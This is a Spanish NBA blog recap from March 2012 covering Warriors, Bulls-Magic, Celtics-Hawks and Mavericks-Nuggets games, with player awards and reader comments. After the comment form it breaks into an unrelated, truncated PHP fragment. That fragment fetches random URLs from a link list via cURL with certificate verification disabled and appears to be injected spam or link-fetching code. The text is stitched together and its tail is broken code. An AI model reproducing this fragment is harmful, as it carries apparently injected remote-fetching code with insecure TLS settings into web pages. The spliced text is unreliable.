La Crónica: Los Magic dan vergüenza ajena una vez más

20 de March de 2012 por TheDeerHunter

Si yo fuera Richard Jefferson le contaría a mis nietos eso de que “yo estuve allí el día que retiraron la camiseta a Chris Mullin”. Más de una década después de su último partido se pueden contar con los dedos de la mano aleros de su corte. Puro mito hecho a base de talento, con unas condiciones a las que aparentemente cualquiera podría aspirar.

Precisamente Jefferson fue en algún momento uno de los llamados a superarle. Ayer jugó debutaba dignamente en los Warriors aunque estos estuvieran más predispuestos a hacerle el pasillo tanto a Mullin como al propio Kevin Love. Puedo asegurar con cierto sonrojo que alguna vez pensé que Biedrins era un (¿buen?) jugador de baloncesto (97-93).

Por su parte los Bulls se dieron una merendola en Florida. Uno de esos partidos que en Orlando se empeñan en dar pena anotadora. Los mejores por Chicago fueron Boozer y John Lucas. Ni a Rose necesitaron para pegarles el baile (85-59). No es que estuvieran muy católicos los Celtics tampoco. Un parcial de 13-0 en el último cuarto anoche les sirvió para superar a Atlanta (79-76). Hecho nada despreciable porque 13 puntos consecutivos en un choque que se ganaba por debajo de 80 sería algo así como 35 seguidos en cualquier otro.

En Denver los Mavericks se hacían con la serie particular entre ellos (112-95). No es detalle baladí teniendo presente hipotéticos empates a la hora de elegir un Clippers o Lakers en primera ronda. Inmenso Dirk. Correcto debut de Chandler y lesiones de Andre Miller y Gallinari.

Finalmente, meritoria victoria de los Cavs en New Jersey con la dupla demoledora de Irving-Tristan (105-100) y victoria fácil de Philadelphia en Charlotte (105-80).

PREMIOS

MVP: Como ya apuntaba Sancho en un comentario, es llegar la primavera y activarse algo en el cerebro de Dirk Nowitzki. 33 puntos, 11 rebotes y 6 asistencias del alemán en apenas 31 minutos. Impresionante. Kevin Love es el otro destacado del día con sus 36 puntos y 17 rebotes.

Rookie: Ojito a la pareja de los Cavs. Kyrie Irving nos ofreció una actuación a la que más o menos podemos estar acostumbrados de 26 puntos, 5 rebotes y 7 asistencias pero es que su compañero Tristan Thompson cuajó anoche su mejor partido del año con 27 puntos y 12 rebotes. Futuro.

Sorpresa: Thaddeus Young se fue a los 20 puntos (10 de 12), 6 rebotes y 2 tapones en la victoria de los Sixers. Por su parte, Brandan Wright anotó 15 puntos y capturó 6 rebotes, jugando minutos de calidad en Dallas.

Decepción: 59 puntos de los Orlando Magic. Es ver estas puntuaciones en la NBA y venirme ganas de arrancarme los ojos. Tan solo Dwight Howard dio algo la cara.

Esfuerzo en vano: Gerald Wallace jugó su primer gran partido con los Nets pero ya puede ir acostumbrándose al resultado. 27 puntos y 12 rebotes que sirvieron para lo mismo que una nevera en el Polo Sur: Nada.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    24-13 de Carlos Boozer, buen partido suyo.

    Beasley 10 minutos de juego, eso si 8 puntos. Se lesionó o algo?? Y por cierto, no entiendo como juega Tolliver y no Randolph.

      Citar

  2. simon dice:
    #2

    HeiNeKeN:
    24-13 de Carlos Boozer, buen partido suyo.

    Beasley 10 minutos de juego, eso si 8 puntos. Se lesionó o algo?? Y por cierto, no entiendo como juega Tolliver y no Randolph.

    En torno a Randolph tiene que haber alguna historia rara tiene que ser el tio mas manta en los entrenamientos, o se sale siempre de tiesto fuera de la cancha o algo, pq cuando ha tenido minutos en cualquier sitio ha rendido razonablemente bien pero siempre en todos los sitios termina por no jugar y ser un marginado

      Citar

  3. Sancho88 dice:
    #3

    Deer, Jefferson ya debutó este finde en la derrota contra los Jazz, con un 9-7-3 pero con un lamentable 2/14 en tiros. Ayer afinó, pero ya era su segundo partido

      Citar

  4. Sancho88 dice:
    #4

    HeiNeKeN:
    24-13 de Carlos Boozer, buen partido suyo.

    Beasley 10 minutos de juego, eso si 8 puntos. Se lesionó o algo?? Y por cierto, no entiendo como juega Tolliver y no Randolph.

    Puede ser que les esté rotando, pero tampoco aporta demasiado más Randolph. Contra los Kings demostró que tiene ciertas aptitudes para el basket, pero físicamente le veo muy endeble, incapaz de defender a nadie.

      Citar

  5. Sancho88 dice:
    #5

    Hostia, menudo mate en la cara de Teague a Allen no? Aunque vale para lo mismo que la nevera del polo sur, jejej

      Citar

  6. Txusma dice:
    #6

    La que se formó en el homenaje a Chris Mullin. En cuanto cogió el micro el propietario de los Warriors, los aficionados empezaron a abuchearle y no pararon ni tras los intentos de Mullin y Rick Barry… Están enfadados en la bahía.

      Citar

  7. melo15 dice:
    #7

    Pero a quien abuchean? A Mullin o al GM?

      Citar

  8. The wolf dice:
    #8

    al dueño de los warriors aqui dejo la noticia y el video para el que quiera verlo

    http://www.tubasket.com/noticia/nba/bochornoso-retirada-camiseta-mullin-acaba-tremendo-abucheo-al-dueno-gs-video/1402341/105

      Citar

  9. TheDeerHunter dice:
    #9

    Fallo mío lo de Jefferson. Las fallas es lo que tienen…
    Pero qué poco me quiere Txus a la hora elegir el titular. Verás cuando lo vea Denise XD XD XD

      Citar

  10. Sancho88 dice:
    #10

    El titular tiene toda la razón. Lo que hace Denise es defender lo indefendible, a una banda que una vez por semana, más o menos, se desenchufa y no hace su trabajo. Esa es la realidad

      Citar

  11. Esteban dice:
    #11

    lo de los magic no tiene solucion, algo anda mal en los directivos de esa franquicia, era claro que no iban hacia ningun lado antes de la fecha limite de traspaso, asi que habian asegurado que buscarian un compñaero para q howard puede pelear el campeonato, en fin howard se arrepintio y renovo por un año mas, ahora yo me pregunto por q se olvidaron de la segunda espada que necesitaba superman, es como si por q howard renovo, todo es color de rosa pero no es asi

    el magic marcha tercero en el este, pero la verdad, la diferencia entre chicaco, miami y el thunder con el resto es abismal, indescontable este año, solamente lakers y spurs y con suerte menphis podrian por momentos pensar que estan a la altura de las tres potencias

      Citar

  12. Lucho dice:
    #12

    todas victorias visitantes anoche

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>